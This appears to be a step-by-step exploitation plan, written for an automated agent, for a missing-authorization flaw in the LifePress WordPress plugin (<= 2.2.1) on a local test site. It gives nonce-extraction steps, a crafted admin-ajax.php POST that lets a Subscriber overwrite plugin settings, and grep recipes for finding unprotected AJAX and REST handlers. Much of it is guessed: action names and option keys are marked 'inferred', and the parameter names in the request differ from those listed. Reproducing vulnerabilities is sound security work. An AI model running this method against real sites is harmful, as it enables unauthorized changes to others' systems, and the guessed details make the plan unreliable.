LifePress <= 2.2.1 - Missing Authorization

This research plan outlines the steps to investigate and exploit a missing authorization vulnerability in the LifePress plugin (versions <= 2.2.1). Since source code was not provided, this plan focuses on identifying the specific vulnerable AJAX action and exploiting it to perform an unauthorized configuration change.

---

1. Vulnerability Summary

The LifePress plugin fails to implement proper capability checks (e.g., current_user_can( 'manage_options' )) in one or more of its AJAX handlers. While these handlers likely implement nonce verification to prevent CSRF, the lack of a capability check allows any authenticated user (including low-privileged Subscribers) to execute the function. This typically results in the ability to modify plugin settings or delete plugin-managed data.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• Vulnerable Action: Likely lifepress_save_settings, lifepress_update_options, or lifepress_delete_post (inferred).
• Payload Parameter: action, security (or nonce), and the specific data to be modified.
• Authentication: Authenticated (Subscriber-level).
• Preconditions: A valid nonce for the specific action must be obtained.

3. Code Flow (Inferred)

1. Registration: The plugin registers an AJAX action for authenticated users via add_action( 'wp_ajax_...' ) in a file like includes/class-lifepress-admin.php or the main plugin file.
2. Entry Point: When a request hits admin-ajax.php with the specified action, WordPress routes it to the plugin's callback function.
3. Vulnerable Check: The callback function likely calls check_ajax_referer( 'some-nonce-action', 'security' ) but does not follow it with if ( ! current_user_can( 'manage_options' ) ) wp_die();.
4. Sink: The function then proceeds to update database options using update_option() or deletes content using wp_delete_post().

4. Nonce Acquisition Strategy

To exploit the wp_ajax_ hook, a valid nonce is required. The execution agent must first identify the localization key used by the plugin.

1. Identify Action and Nonce Key:
   Grep the plugin directory for the registration and localization:

   grep -r "wp_ajax_" .
   grep -r "wp_localize_script" .
   

2. Locate the Hook:
   Identify which admin page or shortcode enqueues the script containing the nonce.
3. Setup Page for Nonce Extraction:
   If the nonce is only loaded on admin pages, the Subscriber user might still be able to see it in the wp-admin dashboard or via a specific plugin page. If it's loaded via a shortcode:

   wp post create --post_type=page --post_status=publish --post_title="LifePress Test" --post_content="[lifepress_shortcode]"
   

4. Extract via Browser:
   Navigate as the Subscriber user and extract the nonce:
   • Localization Object (Inferred): lp_settings_params or lifepress_vars
   • JS Key: nonce or security
   • Command: browser_eval("window.lp_settings_params?.nonce")

5. Exploitation Strategy

Once the action name and nonce are identified, the agent will perform an unauthorized setting update.

Target Action (Example): lifepress_save_settings
Required Parameters:

• action: lifepress_save_settings (inferred)
• security: [EXTRACTED_NONCE]
• lp_option_name: lp_some_critical_setting
• lp_option_value: attacker_value

HTTP Request (via http_request tool):

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [SUBSCRIBER_COOKIES]

action=lifepress_save_settings&security=[NONCE]&setting_key=some_option&setting_value=malicious_val

6. Test Data Setup

1. Install Plugin: Ensure LifePress version 2.2.1 is installed.
2. Create User: Create a subscriber-level user.

   wp user create attacker attacker@example.com --role=subscriber --user_pass=password
   

3. Initial State: Identify an existing plugin option to modify.

   wp option get lp_settings
   

7. Expected Results

• The admin-ajax.php request should return a 200 OK or a success JSON (e.g., {"success":true}).
• The server should NOT return a 403 Forbidden or a -1 (which indicates nonce failure).
• The targeted WordPress option in the wp_options table should be updated to the attacker-supplied value.

8. Verification Steps

After the HTTP request, verify the impact using WP-CLI:

# Check if the specific option was changed
wp option get lp_settings

# Or, if it's a metadata-based change
wp post get [POST_ID] --field=post_content

9. Alternative Approaches

If lifepress_save_settings is not the vulnerable action, the agent should:

1. Grep for update_option: Search for functions that update options and are called within AJAX handlers.

   grep -rn "update_option" . --include="*.php"
   

2. Audit AJAX Handlers: Systematically check every function registered to wp_ajax_ and look for the absence of current_user_can.
3. Check REST API: If the plugin uses the REST API instead of AJAX, look for register_rest_route without a permission_callback or one that returns true.

   grep -rn "register_rest_route" . -A 5
   

   If a REST route is found with 'permission_callback' => '__return_true', this is a high-priority target.